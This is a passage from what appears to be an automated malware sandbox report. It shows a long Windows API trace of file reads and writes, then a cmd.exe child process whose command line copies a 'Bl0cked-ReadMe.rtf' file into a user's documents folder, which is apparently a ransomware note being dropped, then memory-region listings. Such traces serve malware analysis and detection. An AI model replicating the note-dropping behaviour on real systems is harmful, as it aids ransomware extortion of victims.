lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.874] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.874] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.875] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.875] ReadFile 
(in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.876] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.876] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, 
lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, 
lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.877] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.878] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.879] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.879] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0234.879] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] 
GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] GetFileType (hFile=0x4c) returned 0x1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.880] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x32, lpOverlapped=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] GetFileType (hFile=0x4c) returned 0x1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] GetFileType (hFile=0x4c) returned 0x1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | 
out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x32, lpOverlapped=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.880] _close (_FileHandle=4) returned 0 [0234.880] FindNextFileW (in: hFindFile=0x380e70, lpFindFileData=0x26f144 | out: lpFindFileData=0x26f144) returned 0 [0234.881] GetLastError () returned 0x12 [0234.881] FindClose (in: hFindFile=0x380e70 | out: hFindFile=0x380e70) returned 1 [0234.881] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0235.360] _close (_FileHandle=3) returned 0 [0235.361] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.361] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.361] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.361] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.361] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.361] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.361] SetConsoleInputExeNameW () returned 0x1 [0235.361] GetConsoleOutputCP () returned 0x1b5 [0235.361] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.361] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.361] exit (_Code=0) Process: id = "633" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166e0" os_pid = "0xdec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], 
"Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35038 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35039 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35040 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35041 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 35042 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35043 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35044 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35045 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35046 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 35047 start_va = 0x7ffdf000 end_va = 0x7ffdffff 
entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35498 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35499 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35500 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35501 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 35502 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 35503 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35504 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35507 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35508 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35509 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35510 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35511 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35512 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 35513 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35514 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = 